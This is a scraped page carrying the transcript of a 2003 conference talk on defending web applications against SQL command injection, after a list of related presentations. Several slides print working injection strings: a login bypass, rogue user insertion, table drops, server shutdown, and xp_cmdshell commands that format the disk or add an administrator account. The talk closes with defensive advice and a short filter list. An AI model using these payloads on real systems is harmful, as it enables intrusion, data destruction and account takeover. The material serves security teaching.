Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.

Slides:



Advertisements
Similar presentations
Module XIV SQL Injection
Advertisements

Webgoat.
OWASP’s Ten Most Critical Web Application Security Vulnerabilities
© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Understand Database Security Concepts
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
Web Application Security Vulnerabilities Yen-Cheng Chen Department of Information Management National Chi Nan University Puli, 545 Nantou, Taiwan
-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.
Into the Mind of the Hacker: Hands-On Web Application Hacking Adam Doupé University of California, Santa Barbara 4/23/12.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
The 10 Most Critical Web Application Security Vulnerabilities
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.
MIS Week 11 Site:
OWASP Zed Attack Proxy Project Lead
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
August 1, The Software Security Problem August 1, 2006.
Attacking Applications: SQL Injection & Buffer Overflows.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Effective Security in ASP.Net Applications Jatin Sharma: Summer 2005.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.
Input Validation – common associated risks  ______________ user input controls SQL statements ultimately executed by a database server
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
Sumanth M Ganesh B CPSC 620.  SQL Injection attacks allow a malicious individual to execute arbitrary SQL code on your server  The attack could involve.
nd Joint Workshop between Security Research Labs in JAPAN and KOREA Marking Scheme for Semantic- aware Web Application Security HPC.
Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.
Web Applications Testing By Jamie Rougvie Supported by.
Building Secure Web Applications With ASP.Net MVC.
Avoiding Backend Exploitation of Mail Forms Max Kessler, LPIC-1.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.
OWASP Building Secure Web Applications And the OWASP top 10 vulnerabilities.
Security Attacks CS 795. Buffer Overflow Problem Buffer overflow Analysis of Buffer Overflow Attacks.
Chapter 1 The Software Security Problem. Goals of this course Become aware of common pitfalls. Static Analysis and tools.
Mr. Justin “JET” Turner CSCI 3000 – Fall 2015 CRN Section A – TR 9:30-10:45 CRN – Section B – TR 5:30-6:45.
SQL Injection Anthony Brown March 4, 2008 IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions.
Secure Authentication. SQL Injection Many web developers are unaware of how SQL queries can be tampered with SQL queries are able to circumvent access.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Do not try any of the techniques discussed in this presentation on a system you do not own. It is illegal and you will get caught.
2006 Adobe Systems Incorporated. All Rights Reserved. ColdFusion Application Security Adam Wayne Lehman ColdFusion Specialist Adobe Systems, Inc.
SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion.
SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.
CSE509 System Security Attacks against the server-side of web applications Nick Nikiforakis
Web Application Vulnerabilities
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
WEB APPLICATION TESTING
Using SQL Server through Command Prompt
Marking Scheme for Semantic-aware Web Application Security
Intro to Ethical Hacking
امنیت نرم‌افزارهای وب تقديم به پيشگاه مقدس امام عصر (عج) عباس نادری
WWW安全 國立暨南國際大學 資訊管理學系 陳彥錚.
Intro to Ethical Hacking
Presentation transcript:

Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003

The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses. The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses.

The OWASP Top-10 Unvalidated Parameters Unvalidated Parameters Broken Access Control Broken Access Control Broken Account and Session Management Broken Account and Session Management Cross-Site Scripting (XSS) Flaws Cross-Site Scripting (XSS) Flaws Buffer Overflows Buffer Overflows Command Injection Flaws Command Injection Flaws Error Handling Problems Error Handling Problems Insecure Use of Cryptography Insecure Use of Cryptography Remote Administration Flaws Remote Administration Flaws Web and Application Server Misconfiguration Web and Application Server Misconfiguration

The front door: Any time the user can supply free- form text that will be incorporated directly into a SQL statement. Username: Password:

How the lock works: ASP/PHP/CGI is used to compose a SQL querry  SELECT * FROM tbl_Users WHERE UID='testuser' AND PWD='testpass'

How the lock fails: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1;--'

Going through the broken lock…

Is Account_No really a number?

Going through the broken lock…

‘; INSERT INTO tbl_Users VALUES ‘newuser’, ‘password’, ’lastname’, ‘firstname’, ‘account’;-- ‘; INSERT INTO tbl_Users VALUES ‘newuser’, ‘password’, ’lastname’, ‘firstname’, ‘account’;-- ‘; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE ORDER BY UID) WHERE UID=‘newuser’;-- ‘; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE ORDER BY UID) WHERE UID=‘newuser’;--

Fun things you can you do with a broken lock: SELECT * FROM tbl_Users WHERE UID='‘; exec master..xp_cmdshell ‘dir c:\ > c:\inetpub\wwwroot\directory.txt’;--' ANDPWD='' You should then be able to browse to the file you have just created.

Fun things you can you do with a broken lock: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1; exec me.’;--'

Causing damage: ‘; shutdown with nowait;-- ‘; shutdown with nowait;-- Get the name of the table by using a “having” clause (‘ having 1=1;--), then ‘; drop table tablename;-- Get the name of the table by using a “having” clause (‘ having 1=1;--), then ‘; drop table tablename;--

Causing damage: how about this: ‘; exec master..xp_cmdshell ‘format c: /q /yes’;-- how about this: ‘; exec master..xp_cmdshell ‘format c: /q /yes’;-- or this: ‘; exec master..xp_cmdshell ‘net user newacct password /add’; exec master..xp_cmdshell ‘net localgroup administrators newacct /add’;-- or this: ‘; exec master..xp_cmdshell ‘net user newacct password /add’; exec master..xp_cmdshell ‘net localgroup administrators newacct /add’;--

What can we do about it: Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need. Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need. Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc…) Don’t depend on client-side checks Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc…) Don’t depend on client-side checks

What can we do about it: Redirect the default error messages. Redirect the default error messages. Move ASP-built SQL queries into stored procedures. Move ASP-built SQL queries into stored procedures. Check referral URL’s. Check referral URL’s. Don’t give away information for free. Don’t give away information for free. Keep application logs. Keep application logs.

Thank You! Questions?